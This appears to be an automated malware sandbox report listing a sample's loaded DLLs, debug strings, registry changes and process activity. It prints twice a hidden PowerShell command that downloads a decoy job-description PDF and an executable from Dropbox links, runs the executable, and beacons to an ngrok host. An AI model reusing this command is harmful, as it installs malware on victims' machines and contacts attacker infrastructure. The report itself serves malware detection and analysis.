Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Section loaded: k7rn7l32.dll
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Section loaded: ntd3ll.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: mswsock.dll

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2341629826.0000013D25540000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb" source: powershell.exe, 00000002.00000002.2346076101.0000013D25AD3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2343680999.0000013D25642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401365297.00000000054E0000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401236217.0000000002FE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2408564837.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409081301.0000000005530000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.2346311590.0000013D25ADC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2346423503.0000013D25B05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2346076101.0000013D25AB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2402695142.0000000005680000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409389529.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\assassin\assassin-playground\dx10_integration\main\output\win32\exe\scimitar_dx10_f.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.000000000177E000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000000.2382847972.000000000177E000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: ntdll.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399795057.0000000005650000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399301584.0000000005460000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2406466555.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2405170891.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400471565.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400727237.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2407681225.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000002.00000002.2345149895.0000013D25734000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399795057.0000000005650000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399301584.0000000005460000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2406466555.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2405170891.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400471565.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400727237.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2407681225.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: softy.pdbg source: powershell.exe, 00000002.00000002.2343680999.0000013D25642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: utomation.pdb source: powershell.exe, 00000002.00000002.2346365955.0000013D25AF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2402695142.0000000005680000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409389529.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401365297.00000000054E0000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401236217.0000000002FE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2408564837.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409081301.0000000005530000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbEg source: powershell.exe, 00000002.00000002.2346423503.0000013D25B05000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }"			Jump to behavior

Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe.2.dr	Static PE information: section name: _RDATA
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe.2.dr	Static PE information: section name: .data1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B93842E pushad ; ret	2_2_00007FFD9B93845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B934278 push E95CA762h; ret	2_2_00007FFD9B934299
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B93D626 pushad ; ret	2_2_00007FFD9B93D639
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B93845E push eax; ret	2_2_00007FFD9B93846D
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6A0F9 push FFFFFF82h; iretd	23_3_02C6A0FB
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6D8A0 push 0000002Eh; iretd	23_3_02C6D8A2
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6A840 push ebp; retf	23_3_02C6A841
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6B86D push ebx; ret	23_3_02C6B864
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6E80E push eax; iretd	23_3_02C6E81D
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6E83C pushad ; ret	23_3_02C6E841
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6B1DD push eax; ret	23_3_02C6B1DF
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C68904 push ecx; ret	23_3_02C68917
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C69F6A push eax; ret	23_3_02C69F75
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6B70B push ebx; ret	23_3_02C6B864
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C6E586 pushad ; retf	23_3_02C6E599
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB18C0 push ebp; retf	24_3_02DB18C1
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB28ED push ebx; ret	24_3_02DB28E4
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB588E push eax; iretd	24_3_02DB589D
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB58BC pushad ; ret	24_3_02DB58C1
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB225D push eax; ret	24_3_02DB225F
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB6012 push 00000038h; iretd	24_3_02DB601D
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB5606 pushad ; retf	24_3_02DB5619
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB0FEA push eax; ret	24_3_02DB0FF5
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB5FEE push FFFFFFD2h; retf	24_3_02DB6011
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB278B push ebx; ret	24_3_02DB28E4
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB1179 push FFFFFF82h; iretd	24_3_02DB117B
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB5F0C push es; iretd	24_3_02DB5F0D
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB4920 push 0000002Eh; iretd	24_3_02DB4922

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
